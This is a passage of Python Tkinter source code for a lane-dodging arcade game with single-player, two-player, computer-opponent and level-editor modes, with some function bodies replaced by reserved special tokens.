canvas.create_text(data.width / 2, 660, text= """You lose a life for hitting a drop & don't get eaten!""", font='Arial 15 bold', fill='yellow') if data.levelEditorLives <= 0: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='You Made it!', font= 'Arial 23 bold', fill='yellow') <|reserved_special_token_0|> def difficultyMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY - data.r <= event.y <= data.enterY + data.r: if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.mode = 'AI' def difficultyTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) def hitAI1(data, distance): for coconut in data.coconutsAI1: if (data.player1Y - data.r - coconut.y <= distance and data. switchOnProgress == False): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r or AISwitchBug(data, distance) == True): testInt = random.randint(0, 9) if testInt <= data.difficulty: data.switchOnProgress = True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress = False if (coconut.y >= data.player1Y - data.r and coconut.y <= data. player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data. player1X + data.r): data.player1Y += 50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): for scaryBug in data.scaryBug: if (data.player1Y - data.r - scaryBug.y <= distance and data. switchOnProgress == False): if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data .player1X + data.r): return True def hitAI2(data, distance): for coconut in data.coconutsAI2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data. player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data. player2X + data.r): data.player2Y += 50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner == None: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 8 == 0: xPosition2 = random.randint(0, 80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2, 0)) data.coconutsAI1.append(Coconuts(xPosition3, 0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0)) data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0)) addExtraCoconut(data) addPowerUpsAI(data) <|reserved_special_token_0|> def addPowerUpsAI(data): if data.time % 33 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(550, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 66 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(550, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(750, 750)) <|reserved_special_token_0|> def AITimerFired(data): if data.winner == None: if data.Invincible1 == False: hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False: coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.Invincible1 == False: hitAI1(data, 13) if data.Invincible2 == True: pass elif data.Invincible2 == False: hitAI2(data, 13) data.player1Y -= data.speedAI if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 coconutShotAI(data) data.player2Y -= data.speedAI if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False <|reserved_special_token_0|> def AIWinner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text='The Computer Won :(', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! You Won!', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def scoreboardKeyPressed(event, data): if event.keysym == 'r': init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!', font='Arial 30 bold', fill='yellow') canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font= 'Arial 20 bold', fill='yellow') drawHome(canvas, data) data.savedScores data.savedScores = readFile('score.txt') score = data.savedScores.splitlines() scores = [] for line in score: scores.append(line.split(',')) scores = sorted(scores, key=lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width / 2, data.scoreShift + i * 50, text= top5[i], font='Arial 18 bold', fill='yellow') def helpKeyPressed(event, data): if event.keysym == 'r': init(data) <|reserved_special_token_0|> def helpRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas, data)) root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) root.mainloop() print('bye!') <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def init(data): data.score = 0 data.mode = 'splashScreen' data.timerDelay = 100 data.height = 800 data.width = 800 data.speed = 10 data.speedAI = 12 data.speedAI2 = 12 data.switchOnProgress = False data.r = 25 data.cx = 280 data.cy = 750 data.onLeft1, data.onLeft2 = True, True data.win = False data.coconuts = [] data.powerUps = [] data.coconuts1 = [] data.coconuts2 = [] data.coconutsAI1 = [] data.coconutsAI2 = [] data.invincible = [] data.pauseDrops = False data.pause1Drop = False data.pause2Drop = False init1(data) <|reserved_special_token_0|> def init2(data): data.tbg = PhotoImage(file='tbg2.gif') data.click = PhotoImage(file='click.gif') data.notClick = PhotoImage(file='notClick.gif') data.player1X = 150 data.player1Y = 750 data.player2X = 550 data.player2Y = 750 data.winner = None data.speed = 12 data.speed2 = 12 data.editorTime = 0 data.editorDrops = [] data.margin = 100 data.enter = False data.powerUpsEditor = None data.yourSpeed = None data.rainSpeed = None data.slow = data.notClick data.medium = data.notClick data.fast = data.notClick data.drizzle = data.notClick data.rain = data.notClick data.thunderstorm = data.notClick init3(data) def init3(data): data.yes = data.notClick data.no = data.notClick data.enter = data.notClick data.levelEditorLives = 2 data.rSpeed = None data.start = None data.start1 = None data.start2 = None data.difficulty = None data.mode1 = data.notClick data.mode2 = data.notClick data.mode3 = data.notClick data.mode4 = data.notClick data.mode5 = data.notClick data.mode6 = data.notClick data.home = PhotoImage(file='home.gif') data.helpScreen = PhotoImage(file='help1.gif') data.title = PhotoImage(file='title.gif') data.scoreList = [] data.spotList = [270, 364, 458, 552, 646, 740] data.savedScores = readFile('score.txt') if data.mode == 'levelCreated': setEverything(data) initsplashScreenNumbers(data) def initsplashScreenNumbers(data): data.splashButtonY = 425 data.p1ButtonX = 225 data.p2ButtonX = 290 data.edButton = 355 data.diffButton = 425 data.helpButton = 490 data.sboardButton = 555 data.hitPenalty = 75 data.splashText = data.height / 2 - 20 data.lives = 2 data.levelMax = 8 data.lane = 94 data.Player1Min = 270 data.Player1Max = 740 data.homeX = 50 data.homeY = 650 initScoreBoardHelp(data) init1Player(data) <|reserved_special_token_0|> def init1Player(data): data.buffer = 40 def initAI(data): data.AITY = 225 data.easyX = 200 data.easyY = 300 data.medX = 400 data.hardX = 600 data.enterY = 450 data.difS = 4 data.difM = 6 data.difH = 8 data.last = 500 data.enterX = 575 data.PUT = 450 data.RST = 350 data.YST = 250 def mousePressed(event, data): if data.mode == 'splashScreen': splashScreenMousePressed(event, data) elif data.mode == '1Player': playerMousePressed(event, data) elif data.mode == '2Player': twoPlayerMousePressed(event, data) elif data.mode == 'editor': editorMousePressed(event, data) elif data.mode == 'levelCreated': levelCreatedMousePressed(event, data) elif data.mode == 'AI': AIMousePressed(event, data) elif data.mode == 'difficulty': difficultyMousePressed(event, data) elif data.mode == 'scoreboard': scoreboardMousePressed(event, data) elif data.mode == 'help': helpMousePressed(event, data) <|reserved_special_token_0|> def timerFired(data): if data.mode == 'splashScreen': splashScreenTimerFired(data) elif data.mode == '1Player': playerTimerFired(data) elif data.mode == '2Player': twoPlayerTimerFired(data) elif data.mode == 'editor': editorTimerFired(data) elif data.mode == 'levelCreated': levelCreatedTimerFired(data) elif data.mode == 'AI': AITimerFired(data) elif data.mode == 'difficulty': difficultyTimerFired(data) elif data.mode == 'scoreboard': scoreboardTimerFired(data) elif data.mode == 'help': helpTimerFired(data) def redrawAll(canvas, data): if data.mode == 'splashScreen': splashScreenRedrawAll(canvas, data) elif data.mode == '1Player': playerRedrawAll(canvas, data) elif data.mode == '2Player': twoPlayerRedrawAll(canvas, data) elif data.mode == 'editor': editorRedrawAll(canvas, data) elif data.mode == 'levelCreated': levelCreatedRedrawAll(canvas, data) elif data.mode == 'AI': AIRedrawAll(canvas, data) elif data.mode == 'difficulty': difficultyRedrawAll(canvas, data) elif data.mode == 'scoreboard': scoreboardRedrawAll(canvas, data) elif data.mode == 'help': helpRedrawAll(canvas, data) <|reserved_special_token_0|> def splashKeyPressed(event, data): pass def splashScreenTimerFired(data): data.splashScreenTime += 1 if data.splashScreenTime % 2 == 1: rainDropSplash(data) for drop in data.splashScreenDrops: drop.onTimerFired(data) def splashScreenButtons(canvas, data): canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1) canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2) canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3) canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4) canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5) canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6 ) def rainDropSplash(data): xPosition = random.randint(0, 800) data.splashScreenDrops.append(Coconuts(xPosition, 0)) def splashScreenRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.splashText - 10, image=data.title) for drop in data.splashScreenDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.splashText, text= """ 1.) Single Player Level Mode 2.) Two-Player Mode 3.) Level Creator Practice Mode 4.) Play Against the Computer 5.) Help and Instructions 6.) Scoreboard """ , font='Arial 14 bold', fill='yellow') splashScreenButtons(canvas, data) def writeFile(path, contents): with open(path, 'wt') as f: f.write(contents) def readFile(path): with open(path, 'rt') as f: return f.read() class Coconuts(object): def __init__(self, x, y): self.x = x self.y = y self.r = 9 self.fill = 'deep sky blue' self.speed = 30 self.outline = 'blue' def draw(self, canvas): canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r, self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill= self.fill, outline=self.outline, width=3) def onTimerFired(self, data): self.y += self.speed def hit(data): for coconut in data.coconuts: if data.mode == '1Player' or data.mode == 'levelCreated': if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r: if (coconut.x >= data.cx - data.r and coconut.x <= data.cx + data.r): data.cy += data.hitPenalty if data.mode == 'levelCreated': data.lives -= 1 elif data.hit == False and data.level < data.levelMax: data.score -= data.level data.coconuts.remove(coconut) if data.mode == 'levelCreated': data.levelEditorLives -= 1 def hit2Player(data): if data.mode == '2Player': if data.Invincible1 == False: for coconut in data.coconuts1: if (coconut.y >= data.player1Y - data.r and coconut.y <= data.player1Y + data.r): if (coconut.x >= data.player1X - data.r and coconut.x <= data.player1X + data.r): data.player1Y += data.hitPenalty data.coconuts1.remove(coconut) if data.Invincible2 == False: for coconut in data.coconuts2: if (coconut.y >= data.player2Y - data.r and coconut.y <= data.player2Y + data.r): if (coconut.x >= data.player2X - data.r and coconut.x <= data.player2X + data.r): data.player2Y += data.hitPenalty data.coconuts2.remove(coconut) class PowerUps(Coconuts): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.hourGlass) def hitPause(data): for powerUp in data.powerUps: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.pauseDrops = True data.start = data.cy data.powerUps.remove(powerUp) elif data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.pause1Drop = True data.start1 = data.player1Y data.powerUps.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.pause2Drop = True data.start2 = data.player2Y data.powerUps.remove(powerUp) class Invincible(PowerUps): def __init__(self, x, y): super().__init__(x, y) def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.umbrella) def hitInvincible(data): for powerUp in data.invincible: if data.mode == '1Player' or data.mode == 'levelCreated': if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r: if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx + data.r): data.beInvincible = True data.start = data.cy data.invincible.remove(powerUp) if data.mode == '2Player' or data.mode == 'AI': if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data. player1Y + data.r): if (powerUp.x >= data.player1X - data.r and powerUp.x <= data.player1X + data.r): data.Invincible1 = True data.start1 = data.player1Y data.invincible.remove(powerUp) if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data. player2Y + data.r): if (powerUp.x >= data.player2X - data.r and powerUp.x <= data.player2X + data.r): data.Invincible2 = True data.start2 = data.player2Y data.invincible.remove(powerUp) class ScaryBug(object): def __init__(self, x, y): self.x = x self.y = y self.speed = 25 def draw(self, canvas, data): canvas.create_image(self.x, self.y, image=data.spider) def onTimerFired(self, data): if data.mode == '2Player' or data.mode == 'AI': self.speed = 35 self.y -= self.speed if (data.mode == '1Player' or data.mode == 'levelCreated' and data. time % 8 == 0): side = random.choice(data.sides) if side == 'l': if self.x - data.lane >= data.Player1Min: self.x -= data.lane else: self.x += data.lane elif side == 'r': if self.x + data.lane <= data.Player1Max: self.x += data.lane else: self.x -= data.lane def hitScaryBug(data): for bug in data.scaryBug: if data.mode == '1Player' or data.mode == 'levelCreated': if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 * data.r): if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + 1.5 * data.r): data.hit = True data.lives = 0 data.levelEditorLives = 0 if data.mode == '2Player' or data.mode == 'AI': if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y + data.r): if (bug.x >= data.player1X - data.r and bug.x <= data. player1X + data.r): data.winner = 'player2' if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y + data.r): if (bug.x >= data.player2X - data.r and bug.x <= data. player2X + data.r): data.winner = 'player1' def drawPowerups(canvas, data): for bug in data.scaryBug: bug.draw(canvas, data) for powerUp in data.powerUps: powerUp.draw(canvas, data) for powerUp in data.invincible: powerUp.draw(canvas, data) def drawHome(canvas, data): canvas.create_image(data.homeX, data.homeY, image=data.home) <|reserved_special_token_0|> def powerUpCoconutShot(data): if data.time % 60 == 0 and data.time % 120 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 100 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def playerRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level, font='Arial 18 bold', fill='yellow') canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score, font='Arial 18 bold', fill='yellow') canvas.create_text(2 * data.width / 3, 660, text= """The greater the level, the more points get added to your score!""" , font='Arial 15 bold', fill='yellow') if data.hit == True: canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. deadScreen) canvas.create_text(data.width / 2, data.height / 4, text= 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold', fill='yellow') canvas.create_text(data.width / 2, 280, text='Score: %d' % data. score, font='Arial 13 bold', fill='yellow') if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data): canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 70, text='You Made it!', font= 'Arial 23 bold', fill='yellow') canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score, font='Arial 15 bold', fill='yellow') canvas.create_text(data.width / 2, 375, text= 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow') canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, 450, fill='white') canvas.create_text(data.width / 2, 425, text=data.name) def drop2Player(data): if data.winner == None and data.pauseDrops == False: if data.time % 15 == 0: xPosition1 = random.randint(0, 385) if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25: if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 + 410, 0)) if data.time % 12 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.coconuts1.append(Coconuts(140, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540, 0)) elif side == 'r': if data.pause1Drop != True: data.coconuts1.append(Coconuts(344, 0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(755, 0)) powerupDrop2Player(data) def powerupDrop2Player(data): if data.time % 45 == 0 and data.time % 90 != 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.powerUps.append(PowerUps(140, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(540, 0)) elif side == 'r': if data.pause1Drop != True: data.powerUps.append(PowerUps(344, 0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755, 0)) if data.time % 60 == 0: side = random.choice(data.sides) if side == 'l': if data.pause1Drop != True: data.invincible.append(Invincible(140, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(540, 0)) elif side == 'r': if data.pause1Drop != True: data.invincible.append(Invincible(344, 0)) if data.pause2Drop != True: data.invincible.append(Invincible(755, 0)) if data.time % 90 == 0: side = random.choice(data.sides) if side == 'l': data.scaryBug.append(ScaryBug(140, 750)) data.scaryBug.append(ScaryBug(540, 750)) elif side == 'r': data.scaryBug.append(ScaryBug(344, 750)) data.scaryBug.append(ScaryBug(755, 750)) def twoPlayerKeyPressed(event, data): if event.keysym == 'r': init(data) if data.winner == None: if event.keysym == 'a' and data.onLeft1 == False: data.onLeft1 = True data.player1X = 150 if event.keysym == 'd' and data.onLeft1 == True: data.onLeft1 = False data.player1X = 330 if event.keysym == 'Left' and data.onLeft2 == False: data.onLeft2 = True data.player2X = 550 if event.keysym == 'Right' and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y -= data.speed if data.player1Y < 15 and data.player2Y > 15: data.winner = 'player1' if data.player1Y > 40: data.time += 1 drop2Player(data) data.player2Y -= data.speed if data.player2Y < 15 and data.player1Y > 15: data.winner = 'player2' if data.player2Y > 40: data.time += 1 drop2Player(data) if data.player1Y < 15 and data.player2Y < 15: data.winner = 'tie' for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: if abs(data.start1 - data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2 - data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): canvas.create_image(data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_image(3 * data.width / 4, data.height / 2, image=data. halfBackground) canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10 ) canvas.create_line(0, 20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill= 'yellow') canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill ='yellow') winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner == 'player1': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 1', font='Arial 23 bold', fill='yellow') elif data.winner == 'player2': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'You Made it! Player 2', font='Arial 23 bold', fill='yellow') elif data.winner == 'tie': canvas.create_rectangle(0, 0, data.width, data.height, fill='black') canvas.create_image(data.width / 2, data.height / 2, image=data. winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width / 2, 100, text= 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow') def editorKeyPressed(event, data): if event.keysym == 'r': init(data) def editorMousePressed(event, data): checkHome(event, data) if data.easyY - data.r <= event.y <= data.easyY + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.yourSpeed = 'slow' data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.yourSpeed = 'medium' data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.yourSpeed = 'fast' data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): if data.medX - data.r <= event.y <= data.medX + data.r: if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r: data.rainSpeed = 'drizzle' data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r: data.rainSpeed = 'rain' data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r: data.rainSpeed = 'thunderstorm' data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick <|reserved_special_token_0|> def drawButtons(canvas, data): data.font, data.fill = 'Helvetica 13 bold', 'yellow' canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data. font, fill=data.fill) canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font) canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font) canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font) canvas.create_image(data.easyX, data.medX, image=data.drizzle) canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data. font, fill=data.fill) canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font) canvas.create_image(data.medX, data.medX, image=data.rain) canvas.create_text(data.medX, data.medX, text='Rain', font=data.font) canvas.create_image(data.hardX, data.medX, image=data.thunderstorm) canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font) canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data. font, fill=data.fill) canvas.create_image(data.easyY, data.last, image=data.yes) canvas.create_text(data.easyY, data.last, text='Yes', font=data.font) canvas.create_image(data.last, data.last, image=data.no) canvas.create_text(data.last, data.last, text='No', font=data.font) changeEnter(canvas, data) def changeEnter(canvas, data): if (data.powerUpsEditor != None and data.yourSpeed != None and data. rainSpeed != None): data.enter = data.click canvas.create_image(data.medX, data.enterX, image=data.enter) canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime % 2 == 0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0, data.width) data.editorDrops.append(Coconuts(xPosition, 0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width / 2, data.height / 2, image=data.background) canvas.create_image(data.width / 2, data.height / 2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width / 2, data.S_P - 10, text= 'Edit Your Level!', font='Arial 23 bold', fill='yellow') drawButtons(canvas, data) drawHome(canvas, data) def setEverything(data): if data.yourSpeed == 'slow': data.speed = 6 elif data.yourSpeed == 'medium': data.speed = 10 elif data.yourSpeed == 'fast': data.speed = 14 if data.rainSpeed == 'thunderstorm': data.rSpeed = 7 elif data.rainSpeed == 'rain': data.rSpeed = 10 elif data.rainSpeed == 'drizzle': data.rSpeed = 13 <|reserved_special_token_0|> def levelPowerUp(data): if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time % 40 != 0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position, 0)) if data.time % 30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position, 0)) if data.time % 35 == 0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position, 750)) <|reserved_special_token_0|> def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives > 0: data.cy -= data.speed if data.cy < 15: data.level += 1 if data.cy > 40: data.time += 1 if data.pauseDrops != True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug 